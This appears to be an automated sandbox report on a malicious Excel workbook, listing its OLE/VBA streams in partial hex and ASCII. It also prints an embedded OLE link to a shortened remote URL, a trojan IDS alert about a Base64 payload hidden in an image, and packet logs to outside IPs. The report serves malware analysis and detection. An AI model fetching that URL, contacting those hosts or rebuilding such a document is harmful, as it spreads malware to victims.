        Document Code Page:1252
        Thumbnail Scaling Desired:False
        Contains Dirty Links:False
        Shared Document:False
        Changed Hyperlinks:False
        Application Version:786432
        General
        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
        VBA File Name:Sheet1.cls
        Stream Size:977
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f8 02 a5 b3 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "Sheet1"
        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
        VBA File Name:Sheet2.cls
        Stream Size:977
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f8 02 0e 2f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "Sheet2"
        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
        VBA File Name:Sheet3.cls
        Stream Size:977
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f8 02 99 22 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "Sheet3"
        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
        VBA File Name:ThisWorkbook.cls
        Stream Size:985
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f8 02 dd 77 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Attribute VB_Name = "ThisWorkbook"
        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = True
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = True
        

        General
        Stream Path:\x1CompObj
        CLSID:
        File Type:data
        Stream Size:114
        Entropy:4.25248375192737
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:\x5DocumentSummaryInformation
        CLSID:
        File Type:data
        Stream Size:244
        Entropy:2.889430592781307
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
        General
        Stream Path:\x5SummaryInformation
        CLSID:
        File Type:data
        Stream Size:200
        Entropy:3.3020681057018666
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . P . . . . . . . . .
        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
        General
        Stream Path:MBD0026D143/\x1CompObj
        CLSID:
        File Type:data
        Stream Size:99
        Entropy:3.631242196770981
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0026D143/Package
        CLSID:
        File Type:Microsoft Excel 2007+
        Stream Size:31531
        Entropy:7.708568817051848
        Base64 Encoded:True
        Data ASCII:P K . . . . . . . . . . ! . c . 7 . . . U . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 63 c2 18 37 9c 01 00 00 55 06 00 00 13 00 d6 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d2 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0026D144/\x1CompObj
        CLSID:
        File Type:data
        Stream Size:99
        Entropy:3.631242196770981
        Base64 Encoded:False
        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0026D144/Package
        CLSID:
        File Type:Microsoft Excel 2007+
        Stream Size:192965
        Entropy:7.9786395883010295
        Base64 Encoded:True
        Data ASCII:P K . . . . . . . . . . ! . 7 % . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 37 25 a4 a3 a1 01 00 00 c2 05 00 00 13 00 d7 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d3 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        General
        Stream Path:MBD0026D145/\x1Ole
        CLSID:
        File Type:data
        Stream Size:622
        Entropy:5.700241618525089
        Base64 Encoded:False
        Data ASCII:. . . . = ) . 1 i . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . : . / . / . h . o . p . . . f . y . i . / . s . W . e . l . 7 . . . . O a ~ . . _ q % . Y w ! . G 7 j & . . F | . . Z J . . I . } . B . r K g J " & s + j 1 p L - . . E R | L . j # @ . . . . . F . b < k H . h d s . d $ ; . { a I . @ ; / . . * . . c . P . e % . . . . . . . . . . . . . . . . " . . . v . s . t . T . h . 6 . c . J . b . Y . m . b . O . 7 . D . H . A . l . c . p . X . 7 . q . K . K . q . r . q . x . Y . a . q . x .
        Data Raw:01 00 00 02 a5 3d 9f 29 0a 81 31 69 00 00 00 00 00 00 00 00 00 00 00 00 ec 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b e8 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 68 00 6f 00 70 00 2e 00 66 00 79 00 69 00 2f 00 73 00 57 00 65 00 6c 00 37 00 00 00 e0 d1 dc 09 e0 4f 61 d6 7e ee 17 e2 9f 82 5f 9d 71 25 0f 59 be 77 b2 91 21 da c3 1f 47 b3 f4 85 37 ae 6a 26 86 f8
        General
        Stream Path:Workbook
        CLSID:
        File Type:Applesoft BASIC program data, first line number 16
        Stream Size:183736
        Entropy:7.997068284466593
        Base64 Encoded:True
        Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . L 6 5 h . M . . y m . . . 3 & 3 5 k . . d # . . . . . . . . . . . . \\ . p . H . ! . 8 1 6 _ ^ q X { { B 4 v S . 4 a . @ ! . * 3 W % O . D . 1 5 % s . . J } . n ! y . . g e , K . ( _ T y . . | L ^ i . ? M B . . . : . a . . . ? . . . = . . . } , . . . ? . ) < . l . . . . U . . . . . . . . l . . . . f . . . . . . W = . . . R 1 m } . C @ . . . m . . . Z " . . . . . . . i . . . n . . . m j 1 . . . & @ s = K & F u a . x A e 8 . 3 . . 1 . . . Z ] A l E .
        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 8f 92 91 0d 0b 4c 36 e3 35 68 07 f8 93 4d 0a 2e 9c 79 6d 02 82 c2 db 81 8c ce ad b1 33 a5 91 8d ae 26 33 8f 35 bd 6b fa f9 1f fa 10 64 a8 23 0e e1 00 02 00 b0 04 c1 00 02 00 9e 06 e2 00 00 00 5c 00 70 00 a9 48 1d a7 9e 21 04 f9 38 dc d6 c0 ce 31 ea 36 5f b1 5e 71 9b 58 7b 7b ae 42 34 76 53 1f
        General
        Stream Path:_VBA_PROJECT_CUR/PROJECT
        CLSID:
        File Type:ASCII text, with CRLF line terminators
        Stream Size:527
        Entropy:5.260067878753555
        Base64 Encoded:True
        Data ASCII:I D = " { F 9 8 D 2 D 7 E - 9 2 1 4 - 4 0 0 E - A 6 7 2 - F 4 D 5 9 9 D C 0 5 6 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 5 D 7 0 C A F 3 4 C A 3 8 C A 3
        Data Raw:49 44 3d 22 7b 46 39 38 44 32 44 37 45 2d 39 32 31 34 2d 34 30 30 45 2d 41 36 37 32 2d 46 34 44 35 39 39 44 43 30 35 36 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
        General
        Stream Path:_VBA_PROJECT_CUR/PROJECTwm
        CLSID:
        File Type:data
        Stream Size:104
        Entropy:3.0488640812019017
        Base64 Encoded:False
        Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
        Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
        General
        Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
        CLSID:
        File Type:data
        Stream Size:2644
        Entropy:3.978109008156702
        Base64 Encoded:False
        Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
        Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
        General
        Stream Path:_VBA_PROJECT_CUR/VBA/dir
        CLSID:
        File Type:data
        Stream Size:553
        Entropy:6.382871743282584
        Base64 Encoded:True
        Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
        Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 0f a9 95 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
        07/03/24-17:58:56.323699TCP2049038ET TROJAN Malicious Base64 Encoded Payload In Image804917391.92.254.29192.168.2.22
        TimestampSource PortDest PortSource IPDest IP
        Jul 3, 2024 17:58:41.938410997 CEST4916380192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:41.943706989 CEST8049163192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:41.943798065 CEST4916380192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:41.943947077 CEST4916380192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:41.948854923 CEST8049163192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:42.562117100 CEST8049163192.185.89.92192.168.2.22
        Jul 3, 2024 17:58:42.562273026 CEST4916380192.168.2.22192.185.89.92
        Jul 3, 2024 17:58:42.576972008 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:42.581825972 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:42.581899881 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:42.581969976 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:42.586844921 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.069353104 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.069376945 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.069387913 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.069580078 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.069583893 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.069583893 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.069624901 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.069766045 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.069777966 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.069817066 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.070003986 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.070106030 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.070116997 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.070127964 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.070137978 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.070153952 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.070153952 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.070166111 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.075084925 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.075153112 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.075154066 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.075166941 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.075191021 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.075201988 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.076838017 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.156187057 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.156205893 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.156220913 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.156243086 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.156338930 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.156351089 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.156361103 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.156368971 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.156368971 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.156389952 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.156743050 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.156780958 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.156923056 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.156946898 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.156963110 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.156977892 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.157154083 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.157165051 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.157176018 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.157196999 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.157208920 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.157555103 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.157604933 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.157681942 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.157692909 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.157716036 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.158011913 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.158025026 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.158066988 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.158440113 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.158477068 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.158540010 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.158551931 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.158582926 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.158595085 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.158859015 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.158870935 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.158894062 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.158906937 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.159307003 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.159348965 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.161150932 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.161206007 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.161243916 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.161256075 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.161288023 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.161446095 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.161489964 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.243103981 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.243227959 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.243230104 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.243242025 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.243275881 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.243360043 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.243405104 CEST4916480192.168.2.22198.46.178.139
        Jul 3, 2024 17:58:43.243779898 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.243793011 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.243803978 CEST8049164198.46.178.139192.168.2.22
        Jul 3, 2024 17:58:43.243815899 CEST8049164198.46.178.139192.168.2.22
